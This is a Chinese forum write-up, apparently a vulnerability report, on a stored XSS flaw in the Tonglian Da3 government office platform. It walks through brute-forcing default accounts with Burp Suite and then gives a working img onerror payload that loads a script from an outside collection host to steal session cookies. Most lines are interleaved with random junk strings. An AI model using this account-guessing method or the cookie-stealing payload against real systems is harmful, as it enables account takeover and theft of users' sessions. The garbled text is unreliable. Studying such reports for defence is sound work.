* E4 l/ K5 R$ `- {* J. U8 N # q; }: j3 S5 W. Z# e+ E8 ^$ l
同联Da3协同办公平台后台通用储存型xss漏洞/ ~% `# T% Q9 w* v- e) I3 C
$ ?- O/ \3 H7 c
. G3 [8 h6 L1 M0 Q, Z5 D% p
平台简介:& u' Y/ d0 W5 ~6 B) k* F
8 s# d2 Q$ l3 f
8 E5 M% |1 N( A$ @& j( f, u 0 Q- k/ t: H S* }( M
- a6 o1 }1 r) w# u5 S
' g* m: `* U& X3 w' U+ ]
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
" Q5 z" w2 r, B. j8 u; t4 L; r同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
) h0 H+ N. C# J- e( c8 k u7 f同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
" x2 J, G3 I7 ?6 r$ k
- ^# S' |2 j. q1 f" l) J
# Z7 ]5 Z3 j, e8 S6 x( f4 X 5 ?) J" U, ?2 k {! B. o& h* n
8 Z" G X( M& W0 P) n! F" D: I
) Q* S. |) H/ e7 O; s7 m
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
, t- g7 e6 I9 T- u! a9 p0 \4 F# Z1 v9 q
9 ` h$ N1 I. d7 d9 D; f " z: u: V8 q; G- O i7 b6 [: i
. f ]* D( m6 @1 \+ Q
4 l5 U3 N' l/ |
- L F8 c" } S; Y4 Q% v http://1.1.1.1:7197/cap-aco/#(案例2-)
5 t0 B* m; J, a2 z# A% P
/ M% B) b$ o5 a 2 D7 K( ]3 [1 C
http://www.XXOO.com (案例1-官网网站)
0 J8 \: Z0 @8 w, R
4 G6 v+ z0 Z: p4 Y
) |( V5 X# h1 n7 O) ] 漏洞详情:
4 U9 T; v# z. H. v4 Z
! g. u9 [& M3 E. W 9 J9 ]: X g+ e2 R. n- k* n
案例一、8 k) U- w, y9 ^$ Y
6 N t- y. G) m5 n X2 r
& ~# N R u/ Z: |0 Y, h" e 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试0 b: K2 B$ L6 [
- a2 G' r1 L& m- _1 W& m
, t4 U4 I. U2 m& C. Y' G 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
* o$ t- v" b- P" S9 X, @# w
1 g8 f3 Y' G9 o
T. W% h/ Q* _) I+ J8 `
/ A" r2 f' B" ~" T- y: o
& s2 C1 W/ o+ ?/ M& a * }9 u+ W+ w4 w9 }6 @6 H# y
- [0 x7 v6 {% p4 I( ?8 X
) R5 d5 f/ w3 Z' W4 ?5 ? + t+ A% L$ O3 I" y1 Z' T. E0 D% N
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: $ C! m( v+ z$ J) I4 S' Y" y, a
& B: x% Q( N. V" T6 c; [& [
8 S. ? J& A5 X8 c( H, D; P8 d' l/ ]& [1 l
. N6 {9 C4 m4 n
5 B+ f! z% R0 O, r( }1 ~, e 7 M1 \6 e/ Z. B# ~; N) R
# T$ I) ?9 w% }+ a. F
4 v: |# o$ L4 M3 J3 i5 Z! p8 y+ k
) |& r) m. `% i4 [, f3 K4 G( ` 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
3 ]4 U1 p( ^$ C: R; R' ^
' G c3 C! [' r: P ' S% O# b9 y. U6 ?( X
" c7 U' L, Q6 G
+ n9 o5 g* O$ l: G1 V# j4 ~
" @( k$ h3 _* g2 w
<img src=x
7 Q$ D2 f9 Q4 V3 konerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: $ n! }/ o( z$ \6 E7 t
- e2 w# P, A% {+ Y# t 6 e8 z, a2 s8 I4 f
. B+ r( n. E+ w
( Z5 O ^2 s$ X& G. j S6 p7 b% V 3 t% n9 q" M8 t& i# D- m
然后发送,接收cookie如图: ' A. i4 P, N: k
( t, a/ D+ e* o" V& ]& K+ |
* P* H2 z& i2 P2 i. I0 T1 u
. @; E) k' p `) g* o4 a- Q6 c
: d2 ]8 I* F" C! \9 S
2 f Y; e: m9 [ Q
) N! ]8 c5 g" T5 E* G5 {
" `# W& q7 V4 u ) @+ G. R3 h; F( H3 S- X Z# ?
$ d: y. z X# t* z' ?% M
4 P1 g+ U9 _' v1 e5 C: G1 O# J. F! S
, K" y7 u: ?, c) u & V- w1 s# F6 Y4 |7 r; h
) G& N) _* p/ W , D R/ b) o, r- ?" g1 j5 @9 G
0 R+ {" a% d5 z
. ~0 X, J# s, A; t( W " z9 [* M# {2 C# J9 z
. t* ~/ R& h k% {4 J) }* p
]' b& z6 h# }9 w) I+ j2 |2 w , t; p* m6 U1 b. F
( [, g$ n* m9 u/ I& r% _
2 `% g. m2 ~/ S
C5 K' Z) |$ i! d 案例2、 ( u3 X* u2 U9 J; D7 ?$ P# H0 v
# j) ?' y8 S, |( n5 x- a ! d9 g5 H9 m4 t9 n9 u" O# k0 [, I
前面步骤都一样,下面看效果图:
" K' F7 j$ n) \& Z
8 ]+ ^ y% p: f5 k* l
2 G/ F; I# M T+ C) {3 J
+ g; p! C8 {' X8 P6 p
, o0 K+ b0 X, z4 ~0 G) ?& d* d
. Z4 Z( n. L% I
0 d6 M/ S; k; X
$ j5 z. T/ n( i& q7 d2 s
: z% M$ B5 e8 z# I' ]0 [
7 R9 w0 E" f c
2 {8 Z3 G( Z, U, m9 X
. O& D: ^& o8 L2 `7 B; y3 A
0 O: z+ _9 M5 c, B
8 S, W0 M5 C2 c" Z
6 D+ m- p* [) u* V9 N/ m( G* _+ T
: i0 a5 X) R8 A+ Z- [$ N
$ w2 o% a0 j: N1 s9 e5 l
- B" h @: i" r# z, ]
9 g1 }' [+ J" A4 h# P) n6 o8 Q* [
5 J$ X1 S. }1 \- u- N! R" R$ i
* h1 y- ^/ d o9 Z ) _ _5 v. ]2 B& H
; e& Z, l- h. a8 i( @+ ~ ( q o9 C0 \; F2 ^+ v) m
. b3 {' u( n0 G% b5 k( J
' {7 ]1 w* \- v" Q9 I
% t& o, _7 `; E* T6 q9 }8 R% O
3 R. A1 ^) a+ |
% ^! q3 d& V2 j$ q7 E& Q